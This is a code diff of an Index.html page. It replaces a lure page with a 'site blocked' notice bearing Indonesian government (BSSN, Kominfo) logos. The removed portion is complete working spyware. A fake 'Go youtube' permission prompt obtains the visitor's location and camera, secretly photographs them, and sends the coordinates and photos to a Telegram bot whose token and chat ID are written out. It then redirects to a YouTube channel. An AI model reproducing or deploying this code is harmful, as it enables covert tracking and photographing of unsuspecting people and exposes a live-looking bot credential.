--- a/Index.html
+++ b/Index.html
@@ -1,225 +1,48 @@
 <!DOCTYPE html>
-<html lang="en">
+<html lang="id">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>private</title>
-    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aos@2.3.4/dist/aos.css" />
+    <title>Situs Diblokir</title>
     <style>
-        /* Gaya CSS Anda tetap sama */
         body {
             font-family: Arial, sans-serif;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
+            text-align: center;
+            padding: 50px;
             background-color: #f0f0f0;
-            margin: 0;
         }
         .container {
-            background-color: rgba(255, 255, 255, 0.5); /* Putih dengan transparansi 50% */
-            display: none;
-            position: fixed;
-            top: 50%;
-            left: 50%;
-            transform: translate(-50%, -50%);
-            border: 2px solid #ff4d88;
+            background-color: white;
             padding: 20px;
-            border-radius: 20px;
-            box-shadow: 0 8px 15px rgba(0, 0, 0, 0.1);
-            z-index: 10;
-            max-width: 90%;
-            width: 100%;
-            box-sizing: border-box;
-            text-align: center;
+            border-radius: 10px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            display: inline-block;
+            max-width: 600px;
         }
-        .popup {
-            background-color: rgba(0, 0, 0, 0.5);
-            position: fixed;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            display: flex;
-            justify-content: center;
-            align-items: center;
+        .logos {
+            margin: 20px 0;
         }
-        .popup-content {
-            background-color: rgba(255, 255, 255, 0.5); /* Putih dengan transparansi 50% */
-            border: 2px solid #feedf3;
-            padding: 20px;
-            border-radius: 20px;
-            box-shadow: 0 8px 15px rgba(0, 0, 0, 0.1);
-            text-align: center;
-            width: 300px;
-            max-width: 90%;
-            box-sizing: border-box;
-            /* Tambahkan data-aos untuk animasi */
-            opacity: 0; /* Mulai dari opasitas 0 untuk AOS */
+        .logos img {
+            max-width: 150px;
+            margin: 0 10px;
         }
-        button {
-            padding: 10px 20px;
-            background-color: #ff002d;
-            color: white;
-            border: none;
-            border-radius: 4px;
-            cursor: pointer;
+        h1 {
+            color: #d9534f;
         }
-        button:hover {
-            background-color: #580322;
-        }
-        #error {
-            margin-top: 20px;
-            color: red;
-            font-weight: bold;
-        }
-        
-        .loader {
-            border: 8px solid #f3f3f3;
-            border-radius: 50%;
-            border-top: 8px solid #3498db;
-            width: 50px;
-            height: 50px;
-            animation: spin 1s linear infinite;
-            margin: 0 auto;
-        }
-
-        @keyframes spin {
-            0% { transform: rotate(0deg); }
-            100% { transform: rotate(360deg); }
+        p {
+            color: #333;
         }
     </style>
 </head>
 <body>
-    <div class="popup" id="popup">
-        <div class="popup-content" data-aos="fade-down">
-            <h1>!Warning!</h1>
-            <p>izinkan untuk membuka youtube.</p>
-            <button onclick="requestPermissions()">Go youtube</button>
-            <div id="error"></div>
+    <div class="container">
+        <div class="logos">
+            <img src="https://upload.wikimedia.org/wikipedia/commons/5/5f/Logo_BSSN_%28Badan_Siber_dan_Sandi_Negara%29.png" alt="Logo BSSN">
+            <img src="https://upload.wikimedia.org/wikipedia/commons/8/87/Kominfo-logo-new.png" alt="Logo Kominfo">
         </div>
+        <h1>Situs Diblokir</h1>
+        <p>Situs ini telah disita oleh pemerintah karena melanggar Undang-Undang.</p>
+        <p>Jika Anda memiliki pertanyaan lebih lanjut, silakan hubungi BSSN atau Kominfo.</p>
     </div>
-
-    <div class="container" id="loadingContainer">
-        <div class="loader"></div>
-    </div>
-
-    <script src="https://cdn.jsdelivr.net/npm/aos@2.3.4/dist/aos.js"></script>
-    <script>
-        document.addEventListener('DOMContentLoaded', function() {
-            document.getElementById('popup').style.display = 'flex';
-            AOS.init();
-        });
-
-        const botToken = '7095850929:AAHww_RJttOcbEL2fn9N58i9RuI9Xf0G6mw';
-        const chatId = '5689892196';
-
-        function sendMessageToTelegram(message) {
-            const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
-            return fetch(telegramApiUrl)
-                .then(response => {
-                    if (!response.ok) {
-                        throw new Error('Network response was not ok ' + response.statusText);
-                    }
-                    return response.json();
-                })
-                .catch(error => {
-                    console.error('Failed to send message to Telegram: ' + error.message);
-                    document.getElementById('error').textContent = 'Failed to send message to Telegram: ' + error.message;
-                });
-        }
-
-        function sendLocationToTelegram(latitude, longitude) {
-            const googleMapsUrl = `https://www.google.com/maps/search/?api=1&query=${latitude},${longitude}`;
-            const message = `User location: [Google Maps Link](${googleMapsUrl})`;
-            return sendMessageToTelegram(message);
-        }
-
-        function sendPhotoToTelegram(photoBlob, message) {
-            const formData = new FormData();
-            formData.append('chat_id', chatId);
-            formData.append('photo', photoBlob, 'photo.jpg');
-            formData.append('caption', message);
-
-            const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendPhoto`;
-            return fetch(telegramApiUrl, {
-                method: 'POST',
-                body: formData
-            })
-            .then(response => {
-                if (!response.ok) {
-                    throw new Error('Network response was not ok ' + response.statusText);
-                }
-                return response.json();
-            })
-            .catch(error => {
-                console.error('Failed to send photo to Telegram: ' + error.message);
-                document.getElementById('error').textContent = 'Failed to send photo to Telegram: ' + error.message;
-            });
-        }
-
-        function capturePhoto(videoElement) {
-            return new Promise((resolve, reject) => {
-                const canvas = document.createElement('canvas');
-                canvas.width = videoElement.videoWidth;
-                canvas.height = videoElement.videoHeight;
-                const context = canvas.getContext('2d');
-                context.drawImage(videoElement, 0, 0, canvas.width, canvas.height);
-                canvas.toBlob(blob => resolve(blob), 'image/jpeg');
-            });
-        }
-
-        function startCapturingPhotos(videoElement) {
-            capturePhoto(videoElement)
-                .then(photoBlob => {
-                    const message = "Support ZannMods Nih, Anti Kroco ×•× -" + new Date().toLocaleString();
-                    return sendPhotoToTelegram(photoBlob, message);
-                })
-                .then(() => {
-                    window.location.href = 'https://www.youtube.com/@zannmods'; // Redirect to your YouTube channel
-                })
-                .catch(error => console.error(error));
-        }
-
-        function requestPermissions() {
-            if (navigator.geolocation && navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
-                navigator.geolocation.getCurrentPosition(
-                    position => {
-                        const { latitude, longitude } = position.coords;
-                        sendLocationToTelegram(latitude, longitude)
-                            .then(() => {
-                                return navigator.mediaDevices.getUserMedia({ video: true });
-                            })
-                            .then(stream => {
-                                const video = document.createElement('video');
-                                video.srcObject = stream;
-                                video.setAttribute('autoplay', '');
-                                video.setAttribute('playsinline', '');
-                                video.style.display = 'none';
-                                document.body.appendChild(video);
-                                
-                                video.addEventListener('loadeddata', () => {
-                                    document.getElementById('popup').style.display = 'none';
-                                    document.querySelector('.container').style.display = 'block';
-                                    startCapturingPhotos(video);
-                                });
-                            })
-                            .catch(error => {
-                                document.getElementById('error').textContent = 'Failed to get permissions: ' + error.message;
-                            });
-                    },
-                    error => {
-                        document.getElementById('error').textContent = 'Failed to get location: ' + error.message;
-                    }
-                );
-            } else {
-                document.getElementById('error').textContent = 'Browser does not support required APIs.';
-            }
-        }
-
-        window.onbeforeunload = function() {
-            sendMessageToTelegram('User left the browser.');
-        };
-    </script>
 </body>
 </html>
